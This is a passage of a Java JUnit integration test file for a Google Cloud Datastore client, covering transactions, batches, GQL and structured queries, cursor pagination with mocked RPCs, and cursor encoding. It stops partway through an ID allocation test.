/* * Copyright 2015 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.cloud.datastore; import static org.easymock.EasyMock.createStrictMock; import static org.easymock.EasyMock.replay; import static org.easymock.EasyMock.verify; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertNull; import static org.junit.Assert.assertSame; import static org.junit.Assert.assertTrue; import static org.junit.Assert.fail; import com.google.cloud.ServiceOptions; import com.google.cloud.Timestamp; import com.google.cloud.datastore.Query.ResultType; import com.google.cloud.datastore.StructuredQuery.OrderBy; import com.google.cloud.datastore.StructuredQuery.PropertyFilter; import com.google.cloud.datastore.spi.DatastoreRpcFactory; import com.google.cloud.datastore.spi.v1.DatastoreRpc; import com.google.cloud.datastore.testing.LocalDatastoreHelper; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterators; import com.google.common.collect.Lists; import com.google.datastore.v1.BeginTransactionRequest; import com.google.datastore.v1.BeginTransactionResponse; import com.google.datastore.v1.CommitRequest; import com.google.datastore.v1.CommitResponse; import com.google.datastore.v1.EntityResult; import com.google.datastore.v1.LookupRequest; import 
com.google.datastore.v1.LookupResponse; import com.google.datastore.v1.PartitionId; import com.google.datastore.v1.QueryResultBatch; import com.google.datastore.v1.ReadOptions; import com.google.datastore.v1.ReadOptions.ReadConsistency; import com.google.datastore.v1.ReserveIdsRequest; import com.google.datastore.v1.ReserveIdsResponse; import com.google.datastore.v1.RollbackRequest; import com.google.datastore.v1.RollbackResponse; import com.google.datastore.v1.RunQueryRequest; import com.google.datastore.v1.RunQueryResponse; import com.google.datastore.v1.TransactionOptions; import com.google.protobuf.ByteString; import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Set; import java.util.concurrent.TimeoutException; import org.easymock.EasyMock; import org.junit.AfterClass; import org.junit.Assert; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Test; import org.junit.runner.RunWith; import org.junit.runners.JUnit4; import org.threeten.bp.Duration; @RunWith(JUnit4.class) public class ITDatastoreTest { private static LocalDatastoreHelper helper = LocalDatastoreHelper.create(1.0); private static final DatastoreOptions options = helper.getOptions(); private static final Datastore datastore = options.getService(); private static final String PROJECT_ID = options.getProjectId(); private static final String KIND1 = "kind1"; private static final String KIND2 = "kind2"; private static final String KIND3 = "kind3"; private static final NullValue NULL_VALUE = NullValue.of(); private static final StringValue STR_VALUE = StringValue.of("str"); private static final BooleanValue BOOL_VALUE = BooleanValue.newBuilder(false).setExcludeFromIndexes(true).build(); private static final IncompleteKey INCOMPLETE_KEY1 = IncompleteKey.newBuilder(PROJECT_ID, KIND1).build(); private static final IncompleteKey 
INCOMPLETE_KEY2 = IncompleteKey.newBuilder(PROJECT_ID, KIND2).build(); private static final Key KEY1 = Key.newBuilder(INCOMPLETE_KEY1, "name").build(); private static final Key KEY2 = Key.newBuilder(KEY1, KIND2, 1).build(); private static final Key KEY3 = Key.newBuilder(KEY2).setName("bla").build(); private static final Key KEY4 = Key.newBuilder(KEY2).setName("newName1").build(); private static final Key KEY5 = Key.newBuilder(KEY2).setName("newName2").build(); private static final KeyValue KEY_VALUE = KeyValue.of(KEY1); private static final ListValue LIST_VALUE1 = ListValue.newBuilder().addValue(NULL_VALUE).addValue(STR_VALUE, BOOL_VALUE).build(); private static final ListValue LIST_VALUE2 = ListValue.of(Collections.singletonList(KEY_VALUE)); private static final ListValue EMPTY_LIST_VALUE = ListValue.of(Collections.<Value<?>>emptyList()); private static final TimestampValue TIMESTAMP_VALUE = new TimestampValue(Timestamp.now()); private static final LatLngValue LAT_LNG_VALUE = new LatLngValue(new LatLng(37.422035, -122.084124)); private static final FullEntity<IncompleteKey> PARTIAL_ENTITY1 = FullEntity.newBuilder(INCOMPLETE_KEY2) .set("str", STR_VALUE) .set("bool", BOOL_VALUE) .set("list", LIST_VALUE1) .build(); private static final FullEntity<IncompleteKey> PARTIAL_ENTITY2 = FullEntity.newBuilder(PARTIAL_ENTITY1) .remove("str") .set("bool", true) .set("list", LIST_VALUE1.get()) .build(); private static final FullEntity<IncompleteKey> PARTIAL_ENTITY3 = FullEntity.newBuilder(PARTIAL_ENTITY1) .setKey(IncompleteKey.newBuilder(PROJECT_ID, KIND3).build()) .build(); private static final Entity ENTITY1 = Entity.newBuilder(KEY1) .set("str", STR_VALUE) .set("date", TIMESTAMP_VALUE) .set("latLng", LAT_LNG_VALUE) .set("bool", BOOL_VALUE) .set("partial1", EntityValue.of(PARTIAL_ENTITY1)) .set("list", LIST_VALUE2) .set("emptyList", EMPTY_LIST_VALUE) .build(); private static final Entity ENTITY2 = Entity.newBuilder(ENTITY1) .setKey(KEY2) .remove("str") .set("name", "Dan") 
.setNull("null") .set("age", 20) .build(); private static final Entity ENTITY3 = Entity.newBuilder(ENTITY1) .setKey(KEY3) .remove("str") .set("null", NULL_VALUE) .set("partial1", PARTIAL_ENTITY2) .set("partial2", ENTITY2) .build(); private DatastoreOptions rpcMockOptions; private DatastoreRpcFactory rpcFactoryMock; private DatastoreRpc rpcMock; @BeforeClass public static void beforeClass() throws IOException, InterruptedException { helper.start(); } @Before public void setUp() { rpcFactoryMock = EasyMock.createStrictMock(DatastoreRpcFactory.class); rpcMock = EasyMock.createStrictMock(DatastoreRpc.class); rpcMockOptions = options .toBuilder() .setRetrySettings(ServiceOptions.getDefaultRetrySettings()) .setServiceRpcFactory(rpcFactoryMock) .build(); EasyMock.expect(rpcFactoryMock.create(rpcMockOptions)).andReturn(rpcMock); StructuredQuery<Key> query = Query.newKeyQueryBuilder().build(); QueryResults<Key> result = datastore.run(query); datastore.delete(Iterators.toArray(result, Key.class)); datastore.add(ENTITY1, ENTITY2); } @AfterClass public static void afterClass() throws IOException, InterruptedException, TimeoutException { helper.stop(Duration.ofMinutes(1)); } @Test public void testGetOptions() { assertSame(options, datastore.getOptions()); } @Test public void testNewTransactionCommit() { Transaction transaction = datastore.newTransaction(); transaction.add(ENTITY3); Entity entity2 = Entity.newBuilder(ENTITY2).clear().setNull("bla").build(); transaction.update(entity2); transaction.delete(KEY1); transaction.commit(); List<Entity> list = datastore.fetch(KEY1, KEY2, KEY3); assertNull(list.get(0)); assertEquals(entity2, list.get(1)); assertEquals(ENTITY3, list.get(2)); assertEquals(3, list.size()); try { transaction.commit(); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } try { transaction.rollback(); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } verifyNotUsable(transaction); } @Test public 
void testTransactionWithRead() {
    // A transactional read followed by an external write must abort on commit.
    Transaction transaction = datastore.newTransaction();
    assertNull(transaction.get(KEY3));
    transaction.add(ENTITY3);
    transaction.commit();
    assertEquals(ENTITY3, datastore.get(KEY3));
    transaction = datastore.newTransaction();
    assertEquals(ENTITY3, transaction.get(KEY3));
    // update entity3 during the transaction
    datastore.put(Entity.newBuilder(ENTITY3).clear().build());
    transaction.update(ENTITY2);
    try {
      transaction.commit();
      fail("Expecting a failure");
    } catch (DatastoreException expected) {
      assertEquals("ABORTED", expected.getReason());
    }
  }

  /** Same conflict-detection contract as above, but the read is a query. */
  @Test
  public void testTransactionWithQuery() {
    Query<Entity> query =
        Query.newEntityQueryBuilder()
            .setKind(KIND2)
            .setFilter(PropertyFilter.hasAncestor(KEY2))
            .build();
    Transaction transaction = datastore.newTransaction();
    QueryResults<Entity> results = transaction.run(query);
    assertEquals(ENTITY2, results.next());
    assertFalse(results.hasNext());
    transaction.add(ENTITY3);
    transaction.commit();
    assertEquals(ENTITY3, datastore.get(KEY3));
    transaction = datastore.newTransaction();
    results = transaction.run(query);
    assertEquals(ENTITY2, results.next());
    transaction.delete(ENTITY3.getKey());
    // update entity2 during the transaction
    datastore.put(Entity.newBuilder(ENTITY2).clear().build());
    try {
      transaction.commit();
      fail("Expecting a failure");
    } catch (DatastoreException expected) {
      assertEquals("ABORTED", expected.getReason());
    }
  }

  /** Rollback discards buffered writes; repeating rollback is a no-op. */
  @Test
  public void testNewTransactionRollback() {
    Transaction transaction = datastore.newTransaction();
    transaction.add(ENTITY3);
    Entity entity2 =
        Entity.newBuilder(ENTITY2)
            .clear()
            .setNull("bla")
            .set("list3", StringValue.of("bla"), StringValue.newBuilder("bla").build())
            .build();
    transaction.update(entity2);
    transaction.delete(KEY1);
    transaction.rollback();
    transaction.rollback(); // should be safe to repeat rollback calls
    try {
      transaction.commit();
      fail("Expecting a failure");
    } catch (DatastoreException ex) {
      // expected to fail
    }
    verifyNotUsable(transaction);
    // Nothing from the rolled-back transaction may be visible.
    List<Entity> list = datastore.fetch(KEY1, KEY2, KEY3);
    assertEquals(ENTITY1, list.get(0));
    assertEquals(ENTITY2, list.get(1));
    assertNull(list.get(2));
    assertEquals(3, list.size());
  }

  /**
   * runInTransaction with an explicit READ_WRITE option retries after an
   * ABORTED failure: attempt 1 aborts (rollback expected), attempt 2 commits.
   */
  @Test
  public void testRunInTransactionWithReadWriteOption() {
    EasyMock.expect(rpcMock.beginTransaction(EasyMock.anyObject(BeginTransactionRequest.class)))
        .andReturn(BeginTransactionResponse.getDefaultInstance());
    EasyMock.expect(rpcMock.rollback(EasyMock.anyObject(RollbackRequest.class)))
        .andReturn(RollbackResponse.getDefaultInstance())
        .once();
    EasyMock.expect(rpcMock.beginTransaction(EasyMock.anyObject(BeginTransactionRequest.class)))
        .andReturn(BeginTransactionResponse.getDefaultInstance());
    EasyMock.expect(rpcMock.commit(EasyMock.anyObject(CommitRequest.class)))
        .andReturn(CommitResponse.newBuilder().build());
    EasyMock.replay(rpcFactoryMock, rpcMock);
    Datastore mockDatastore = rpcMockOptions.getService();
    Datastore.TransactionCallable<Integer> callable =
        new Datastore.TransactionCallable<Integer>() {
          private Integer attempts = 1;

          @Override
          public Integer run(DatastoreReaderWriter transaction) {
            // First invocation throws a retryable ABORTED; second succeeds.
            if (attempts < 2) {
              ++attempts;
              throw new DatastoreException(10, "", "ABORTED", false, null);
            }
            return attempts;
          }
        };
    TransactionOptions options =
        TransactionOptions.newBuilder()
            .setReadWrite(TransactionOptions.ReadWrite.getDefaultInstance())
            .build();
    Integer result = mockDatastore.runInTransaction(callable, options);
    EasyMock.verify(rpcFactoryMock, rpcMock);
    assertEquals(2, result.intValue());
  }

  /** Asserts that every write operation on a finished writer throws. */
  private void verifyNotUsable(DatastoreWriter writer) {
    try {
      writer.add(ENTITY3);
      fail("Expecting a failure");
    } catch (DatastoreException ex) {
      // expected to fail
    }
    try {
      writer.put(ENTITY3);
      fail("Expecting a failure");
    } catch (DatastoreException ex) {
      // expected to fail
    }
    try {
      writer.update(ENTITY3);
      fail("Expecting a failure");
    } catch (DatastoreException ex) {
      // expected to fail
    }
    try {
      writer.delete(ENTITY3.getKey());
      fail("Expecting a failure");
    } catch (DatastoreException ex) {
      // expected to fail
    }
  }

  /**
   * Batch semantics: add completes incomplete keys, deferred-id allocation is
   * reported via the response, and a submitted batch is unusable afterwards.
   */
  @Test
  public void testNewBatch() {
    Batch batch = datastore.newBatch();
    Entity entity1 = Entity.newBuilder(ENTITY1).clear().build();
    Entity entity2 = Entity.newBuilder(ENTITY2).clear().setNull("bla").build();
    Entity entity4 = Entity.newBuilder(KEY4).set("value", StringValue.of("value")).build();
    Entity entity5 = Entity.newBuilder(KEY5).set("value", "value").build();
    List<Entity> entities = batch.add(entity4, PARTIAL_ENTITY2, entity5);
    // PARTIAL_ENTITY2 had an incomplete key; the batch assigns it an id.
    Entity entity6 = entities.get(1);
    assertSame(entity4, entities.get(0));
    assertEquals(PARTIAL_ENTITY2.getProperties(), entity6.getProperties());
    assertEquals(PARTIAL_ENTITY2.getKey().getProjectId(), entity6.getKey().getProjectId());
    assertEquals(PARTIAL_ENTITY2.getKey().getNamespace(), entity6.getKey().getNamespace());
    assertEquals(PARTIAL_ENTITY2.getKey().getAncestors(), entity6.getKey().getAncestors());
    assertEquals(PARTIAL_ENTITY2.getKey().getKind(), entity6.getKey().getKind());
    assertEquals(PARTIAL_ENTITY2.getKey(), IncompleteKey.newBuilder(entity6.getKey()).build());
    assertNotEquals(PARTIAL_ENTITY2.getKey().getPath(), entity6.getKey().getPath());
    assertNotEquals(PARTIAL_ENTITY2.getKey(), entity6.getKey());
    assertSame(entity5, entities.get(2));
    batch.addWithDeferredIdAllocation(PARTIAL_ENTITY3);
    batch.put(ENTITY3, entity1, entity2);
    Batch.Response response = batch.submit();
    entities =
        datastore.fetch(KEY1, KEY2, KEY3, entity4.getKey(), entity5.getKey(), entity6.getKey());
    assertEquals(entity1, entities.get(0));
    assertEquals(entity2, entities.get(1));
    assertEquals(ENTITY3, entities.get(2));
    assertEquals(entity4, entities.get(3));
    assertEquals(entity5, entities.get(4));
    assertEquals(entity6, entities.get(5));
    assertEquals(6, entities.size());
    // Exactly one key was deferred (PARTIAL_ENTITY3); check it round-trips.
    List<Key> generatedKeys = response.getGeneratedKeys();
    assertEquals(1, generatedKeys.size());
    assertEquals(
        PARTIAL_ENTITY3.getProperties(), datastore.get(generatedKeys.get(0)).getProperties());
    assertEquals(PARTIAL_ENTITY3.getKey(),
        IncompleteKey.newBuilder(generatedKeys.get(0)).build());
    // A batch may be submitted only once.
    try {
      batch.submit();
      fail("Expecting a failure");
    } catch (DatastoreException ex) {
      // expected to fail
    }
    verifyNotUsable(batch);
    batch = datastore.newBatch();
    batch.delete(entity4.getKey(), entity5.getKey());
    batch.update(ENTITY1, ENTITY2, ENTITY3);
    batch.submit();
    entities = datastore.fetch(KEY1, KEY2, KEY3, entity4.getKey(), entity5.getKey());
    assertEquals(ENTITY1, entities.get(0));
    assertEquals(ENTITY2, entities.get(1));
    assertEquals(ENTITY3, entities.get(2));
    assertNull(entities.get(3));
    assertNull(entities.get(4));
    assertEquals(5, entities.size());
  }

  /**
   * GQL queries built with an explicit ResultType need no client-side cast:
   * covers ENTITY, KEY, and PROJECTION_ENTITY (key-only and property) results.
   */
  @Test
  public void testRunGqlQueryNoCasting() {
    Query<Entity> query1 =
        Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from " + KIND1).build();
    QueryResults<Entity> results1 = datastore.run(query1);
    assertTrue(results1.hasNext());
    assertEquals(ENTITY1, results1.next());
    assertFalse(results1.hasNext());
    datastore.put(ENTITY3);
    Query<? extends Entity> query2 =
        Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from " + KIND2 + " order by __key__")
            .build();
    QueryResults<? extends Entity> results2 = datastore.run(query2);
    assertTrue(results2.hasNext());
    assertEquals(ENTITY2, results2.next());
    assertTrue(results2.hasNext());
    assertEquals(ENTITY3, results2.next());
    assertFalse(results2.hasNext());
    // Querying an unknown kind yields an empty result, not an error.
    query1 = Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from bla").build();
    results1 = datastore.run(query1);
    assertFalse(results1.hasNext());
    Query<Key> keyOnlyQuery =
        Query.newGqlQueryBuilder(ResultType.KEY, "select __key__ from " + KIND1).build();
    QueryResults<Key> keyOnlyResults = datastore.run(keyOnlyQuery);
    assertTrue(keyOnlyResults.hasNext());
    assertEquals(KEY1, keyOnlyResults.next());
    assertFalse(keyOnlyResults.hasNext());
    GqlQuery<ProjectionEntity> keyProjectionQuery =
        Query.newGqlQueryBuilder(ResultType.PROJECTION_ENTITY, "select __key__ from " + KIND1)
            .build();
    QueryResults<ProjectionEntity> keyProjectionResult = datastore.run(keyProjectionQuery);
    assertTrue(keyProjectionResult.hasNext());
    ProjectionEntity projectionEntity = keyProjectionResult.next();
    assertEquals(KEY1, projectionEntity.getKey());
    assertTrue(projectionEntity.getProperties().isEmpty());
    assertFalse(keyProjectionResult.hasNext());
    GqlQuery<ProjectionEntity> projectionQuery =
        Query.newGqlQueryBuilder(ResultType.PROJECTION_ENTITY, "select str, date from " + KIND1)
            .build();
    QueryResults<ProjectionEntity> projectionResult = datastore.run(projectionQuery);
    assertTrue(projectionResult.hasNext());
    projectionEntity = projectionResult.next();
    assertEquals("str", projectionEntity.getString("str"));
    assertEquals(TIMESTAMP_VALUE.get(), projectionEntity.getTimestamp("date"));
    assertEquals(2, projectionEntity.getNames().size());
    assertFalse(projectionResult.hasNext());
  }

  /** Untyped GQL queries default to Entity results and require a caller cast. */
  @Test
  public void testRunGqlQueryWithCasting() {
    @SuppressWarnings("unchecked")
    Query<Entity> query1 =
        (Query<Entity>) Query.newGqlQueryBuilder("select * from " + KIND1).build();
    QueryResults<Entity> results1 = datastore.run(query1);
    assertTrue(results1.hasNext());
    assertEquals(ENTITY1, results1.next());
assertFalse(results1.hasNext()); Query<?> query2 = Query.newGqlQueryBuilder("select * from " + KIND1).build(); QueryResults<?> results2 = datastore.run(query2); assertSame(Entity.class, results2.getResultClass()); @SuppressWarnings("unchecked") QueryResults<Entity> results3 = (QueryResults<Entity>) results2; assertTrue(results3.hasNext()); assertEquals(ENTITY1, results3.next()); assertFalse(results3.hasNext()); } @Test public void testGqlQueryPagination() throws DatastoreException { List<RunQueryResponse> responses = buildResponsesForQueryPagination(); for (int i = 0; i < responses.size(); i++) { EasyMock.expect(rpcMock.runQuery(EasyMock.anyObject(RunQueryRequest.class))) .andReturn(responses.get(i)); } EasyMock.replay(rpcFactoryMock, rpcMock); Datastore mockDatastore = rpcMockOptions.getService(); QueryResults<Key> results = mockDatastore.run( Query.newGqlQueryBuilder(ResultType.KEY, "select __key__ from *").build()); int count = 0; while (results.hasNext()) { count += 1; results.next(); } assertEquals(count, 5); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testRunStructuredQuery() { Query<Entity> query = Query.newEntityQueryBuilder().setKind(KIND1).setOrderBy(OrderBy.asc("__key__")).build(); QueryResults<Entity> results1 = datastore.run(query); assertTrue(results1.hasNext()); assertEquals(ENTITY1, results1.next()); assertFalse(results1.hasNext()); Query<Key> keyOnlyQuery = Query.newKeyQueryBuilder().setKind(KIND1).build(); QueryResults<Key> results2 = datastore.run(keyOnlyQuery); assertTrue(results2.hasNext()); assertEquals(ENTITY1.getKey(), results2.next()); assertFalse(results2.hasNext()); StructuredQuery<ProjectionEntity> keyOnlyProjectionQuery = Query.newProjectionEntityQueryBuilder().setKind(KIND1).setProjection("__key__").build(); QueryResults<ProjectionEntity> results3 = datastore.run(keyOnlyProjectionQuery); assertTrue(results3.hasNext()); ProjectionEntity projectionEntity = results3.next(); assertEquals(ENTITY1.getKey(), 
projectionEntity.getKey()); assertTrue(projectionEntity.getNames().isEmpty()); assertFalse(results2.hasNext()); StructuredQuery<ProjectionEntity> projectionQuery = Query.newProjectionEntityQueryBuilder() .setKind(KIND2) .setProjection("age") .setFilter(PropertyFilter.gt("age", 18)) .setDistinctOn("age") .setOrderBy(OrderBy.asc("age")) .setLimit(10) .build(); QueryResults<ProjectionEntity> results4 = datastore.run(projectionQuery); assertTrue(results4.hasNext()); ProjectionEntity entity = results4.next(); assertEquals(ENTITY2.getKey(), entity.getKey()); assertEquals(20, entity.getLong("age")); assertEquals(1, entity.getProperties().size()); assertFalse(results4.hasNext()); } @Test public void testStructuredQueryPagination() throws DatastoreException { List<RunQueryResponse> responses = buildResponsesForQueryPagination(); for (int i = 0; i < responses.size(); i++) { EasyMock.expect(rpcMock.runQuery(EasyMock.anyObject(RunQueryRequest.class))) .andReturn(responses.get(i)); } EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); QueryResults<Key> results = datastore.run(Query.newKeyQueryBuilder().build()); int count = 0; while (results.hasNext()) { count += 1; results.next(); } assertEquals(count, 5); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testStructuredQueryPaginationWithMoreResults() throws DatastoreException { List<RunQueryResponse> responses = buildResponsesForQueryPagination(); for (int i = 0; i < responses.size(); i++) { EasyMock.expect(rpcMock.runQuery(EasyMock.anyObject(RunQueryRequest.class))) .andReturn(responses.get(i)); } EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); QueryResults<Key> results = datastore.run(Query.newKeyQueryBuilder().build()); int count = 0; while (results.hasNext()) { count += 1; results.next(); } assertEquals(count, 5); assertEquals(QueryResultBatch.MoreResultsType.NO_MORE_RESULTS, results.getMoreResults()); 
    EasyMock.verify(rpcFactoryMock, rpcMock);
  }

  /**
   * Seeds five entities, runs a real key query against the emulator, then slices
   * its batch into three canned responses (1 + 2 + 2 results) so pagination
   * tests can replay them through the mocked RPC layer.
   */
  private List<RunQueryResponse> buildResponsesForQueryPagination() {
    Entity entity4 = Entity.newBuilder(KEY4).set("value", StringValue.of("value")).build();
    Entity entity5 = Entity.newBuilder(KEY5).set("value", "value").build();
    datastore.add(ENTITY3, entity4, entity5);
    List<RunQueryResponse> responses = new ArrayList<>();
    Query<Key> query = Query.newKeyQueryBuilder().build();
    RunQueryRequest.Builder requestPb = RunQueryRequest.newBuilder();
    query.populatePb(requestPb);
    QueryResultBatch queryResultBatchPb =
        RunQueryResponse.newBuilder()
            .mergeFrom(((DatastoreImpl) datastore).runQuery(requestPb.build()))
            .getBatch();
    // Batch 1: first result only, NOT_FINISHED so the client keeps paging.
    QueryResultBatch queryResultBatchPb1 =
        QueryResultBatch.newBuilder()
            .mergeFrom(queryResultBatchPb)
            .setMoreResults(QueryResultBatch.MoreResultsType.NOT_FINISHED)
            .clearEntityResults()
            .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(0, 1))
            .setEndCursor(queryResultBatchPb.getEntityResultsList().get(0).getCursor())
            .build();
    responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb1).build());
    // Batch 2: results 2-3, still NOT_FINISHED.
    QueryResultBatch queryResultBatchPb2 =
        QueryResultBatch.newBuilder()
            .mergeFrom(queryResultBatchPb)
            .setMoreResults(QueryResultBatch.MoreResultsType.NOT_FINISHED)
            .clearEntityResults()
            .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(1, 3))
            .setEndCursor(queryResultBatchPb.getEntityResultsList().get(2).getCursor())
            .build();
    responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb2).build());
    // Batch 3: results 4-5, terminates paging with NO_MORE_RESULTS.
    QueryResultBatch queryResultBatchPb3 =
        QueryResultBatch.newBuilder()
            .mergeFrom(queryResultBatchPb)
            .setMoreResults(QueryResultBatch.MoreResultsType.NO_MORE_RESULTS)
            .clearEntityResults()
            .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(3, 5))
            .setEndCursor(queryResultBatchPb.getEntityResultsList().get(4).getCursor())
            .build();
    responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb3).build());
    return responses;
  }

  @Test
public void testQueryPaginationWithLimit() throws DatastoreException {
    // Page through with limit=2, resuming from the end cursor of each page,
    // and check each page reports the cursor of its canned batch.
    List<RunQueryResponse> responses = buildResponsesForQueryPaginationWithLimit();
    List<ByteString> endCursors = Lists.newArrayListWithCapacity(responses.size());
    for (RunQueryResponse response : responses) {
      EasyMock.expect(rpcMock.runQuery(EasyMock.anyObject(RunQueryRequest.class)))
          .andReturn(response);
      if (response.getBatch().getMoreResults() != QueryResultBatch.MoreResultsType.NOT_FINISHED) {
        endCursors.add(response.getBatch().getEndCursor());
      }
    }
    EasyMock.replay(rpcFactoryMock, rpcMock);
    Datastore datastore = rpcMockOptions.getService();
    int limit = 2;
    int totalCount = 0;
    Iterator<ByteString> cursorIter = endCursors.iterator();
    StructuredQuery<Entity> query = Query.newEntityQueryBuilder().setLimit(limit).build();
    while (true) {
      QueryResults<Entity> results = datastore.run(query);
      int resultCount = 0;
      while (results.hasNext()) {
        results.next();
        resultCount++;
        totalCount++;
      }
      assertTrue(cursorIter.hasNext());
      Cursor expectedEndCursor = Cursor.copyFrom(cursorIter.next().toByteArray());
      assertEquals(expectedEndCursor, results.getCursorAfter());
      // A short page means the final batch was reached.
      if (resultCount < limit) {
        break;
      }
      query = query.toBuilder().setStartCursor(results.getCursorAfter()).build();
    }
    assertEquals(5, totalCount);
    EasyMock.verify(rpcFactoryMock, rpcMock);
  }

  /** An offset larger than the result set skips everything that exists. */
  @Test
  public void testRunKeyQueryWithOffset() {
    Query<Key> query = Query.newKeyQueryBuilder().setOffset(Integer.MAX_VALUE).build();
    int numberOfEntities = datastore.run(query).getSkippedResults();
    assertEquals(2, numberOfEntities);
  }

  /** limit=N caps results at N; limit=0 yields an empty result set. */
  @Test
  public void testRunKeyQueryWithLimit() {
    datastore.put(ENTITY1, ENTITY2);
    Query<Key> keyQuery = Query.newKeyQueryBuilder().setLimit(2).build();
    QueryResults queryResults = datastore.run(keyQuery);
    int resultCount = 0;
    while (queryResults.hasNext()) {
      queryResults.next();
      resultCount++;
    }
    assertEquals(2, resultCount);
    Query<Key> query = Query.newKeyQueryBuilder().setLimit(0).build();
    QueryResults results = datastore.run(query);
    int count = 0;
    while (results.hasNext()) {
      results.next();
      count++;
    }
    assertEquals(0, count);
  }

  /**
   * Like buildResponsesForQueryPagination, but slices into four batches whose
   * MoreResults values exercise the limit/cursor-resume path; batch 2's cursor
   * is deliberately invalid UTF-8.
   */
  private List<RunQueryResponse> buildResponsesForQueryPaginationWithLimit() {
    Entity entity4 = Entity.newBuilder(KEY4).set("value", StringValue.of("value")).build();
    Entity entity5 = Entity.newBuilder(KEY5).set("value", "value").build();
    datastore.add(ENTITY3, entity4, entity5);
    DatastoreRpc datastoreRpc = datastore.getOptions().getDatastoreRpcV1();
    List<RunQueryResponse> responses = new ArrayList<>();
    Query<Entity> query = Query.newEntityQueryBuilder().build();
    RunQueryRequest.Builder requestPb = RunQueryRequest.newBuilder();
    query.populatePb(requestPb);
    QueryResultBatch queryResultBatchPb =
        RunQueryResponse.newBuilder()
            .mergeFrom(datastoreRpc.runQuery(requestPb.build()))
            .getBatch();
    QueryResultBatch queryResultBatchPb1 =
        QueryResultBatch.newBuilder()
            .mergeFrom(queryResultBatchPb)
            .setMoreResults(QueryResultBatch.MoreResultsType.NOT_FINISHED)
            .clearEntityResults()
            .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(0, 1))
            .setEndCursor(ByteString.copyFromUtf8("a"))
            .build();
    responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb1).build());
    QueryResultBatch queryResultBatchPb2 =
        QueryResultBatch.newBuilder()
            .mergeFrom(queryResultBatchPb)
            .setMoreResults(QueryResultBatch.MoreResultsType.MORE_RESULTS_AFTER_LIMIT)
            .clearEntityResults()
            .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(1, 2))
            .setEndCursor(
                ByteString.copyFrom(new byte[] {(byte) 0x80})) // test invalid UTF-8 string
            .build();
    responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb2).build());
    QueryResultBatch queryResultBatchPb3 =
        QueryResultBatch.newBuilder()
            .mergeFrom(queryResultBatchPb)
            .setMoreResults(QueryResultBatch.MoreResultsType.MORE_RESULTS_AFTER_LIMIT)
            .clearEntityResults()
            .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(2, 4))
            .setEndCursor(ByteString.copyFromUtf8("b"))
            .build();
    responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb3).build());
    // Final batch: last result, terminates paging.
    QueryResultBatch queryResultBatchPb4 =
        QueryResultBatch.newBuilder()
            .mergeFrom(queryResultBatchPb)
            .setMoreResults(QueryResultBatch.MoreResultsType.NO_MORE_RESULTS)
            .clearEntityResults()
            .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(4, 5))
            .setEndCursor(ByteString.copyFromUtf8("c"))
            .build();
    responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb4).build());
    return responses;
  }

  /** ReadOption.eventualConsistency() must appear as EVENTUAL in the RunQueryRequest. */
  @Test
  public void testEventualConsistencyQuery() {
    ReadOptions readOption =
        ReadOptions.newBuilder().setReadConsistencyValue(ReadConsistency.EVENTUAL_VALUE).build();
    com.google.datastore.v1.GqlQuery query =
        com.google.datastore.v1.GqlQuery.newBuilder().setQueryString("FROM * SELECT *").build();
    RunQueryRequest.Builder expectedRequest =
        RunQueryRequest.newBuilder()
            .setReadOptions(readOption)
            .setGqlQuery(query)
            .setPartitionId(PartitionId.newBuilder().setProjectId(PROJECT_ID).build());
    EasyMock.expect(rpcMock.runQuery(expectedRequest.build()))
        .andReturn(RunQueryResponse.newBuilder().build());
    EasyMock.replay(rpcFactoryMock, rpcMock);
    Datastore datastore = rpcMockOptions.getService();
    datastore.run(
        Query.newGqlQueryBuilder("FROM * SELECT *").build(), ReadOption.eventualConsistency());
    EasyMock.verify(rpcFactoryMock, rpcMock);
  }

  /** URL-safe cursor encoding round-trips even for invalid-UTF-8 byte payloads. */
  @Test
  public void testToUrlSafe() {
    byte[][] invalidUtf8 =
        new byte[][] {{(byte) 0xfe}, {(byte) 0xc1, (byte) 0xbf}, {(byte) 0xc0}, {(byte) 0x80}};
    for (byte[] bytes : invalidUtf8) {
      assertFalse(ByteString.copyFrom(bytes).isValidUtf8());
      Cursor cursor = new Cursor(ByteString.copyFrom(bytes));
      assertEquals(cursor, Cursor.fromUrlSafe(cursor.toUrlSafe()));
    }
  }

  /**
   * allocateId completes an incomplete key with a fresh numeric id, preserving
   * project/namespace/ancestors/kind, and rejects already-complete keys.
   */
  @Test
  public void testAllocateId() {
    KeyFactory keyFactory = datastore.newKeyFactory().setKind(KIND1);
